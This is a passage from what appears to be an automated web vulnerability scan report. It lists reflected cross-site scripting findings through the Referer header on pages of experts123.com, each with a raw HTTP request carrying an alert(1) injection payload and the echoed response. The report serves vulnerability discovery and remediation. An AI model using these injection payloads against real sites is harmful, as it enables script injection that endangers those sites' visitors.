<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=ccc8e';alert(1)//6bb3a5f1c5f');
});


</script>
...[SNIP]...

4.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "1947f";alert(1)//760c35e1ead";
var RSQ = true;

$(function() {
experts123.Question.initialize(880822, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=a50b1';alert(1)//6a7613daa75');
});


</script>
...[SNIP]...

4.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d5395";alert(1)//8cf555a3bfa";
var RSQ = true;

$(function() {
experts123.Question.initialize(893817, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:57 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=1a44e';alert(1)//5f700a46bff');
});


</script>
...[SNIP]...

4.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:56 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "dacf1";alert(1)//155dee88ae4";
var RSQ = true;

$(function() {
experts123.Question.initialize(541537, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=c2ffb';alert(1)//2017b493094');
});


</script>
...[SNIP]...

4.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d6163";alert(1)//498765472fb";
var RSQ = true;

$(function() {
experts123.Question.initialize(202208, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d0800";alert(1)//0d9e6834871";
var RSQ = true;

$(function() {
experts123.Question.initialize(626726, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=aaeae';alert(1)//9e376e61a79');
});


</script>
...[SNIP]...

4.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "11ee8";alert(1)//0fd04f86b98";
var RSQ = true;

$(function() {
experts123.Question.initialize(197790, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=71c11';alert(1)//0c64a2d8a24');
});


</script>
...[SNIP]...

4.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "aeb3b";alert(1)//3f4b39407ec";
var RSQ = true;

$(function() {
experts123.Question.initialize(1075195, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

4.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

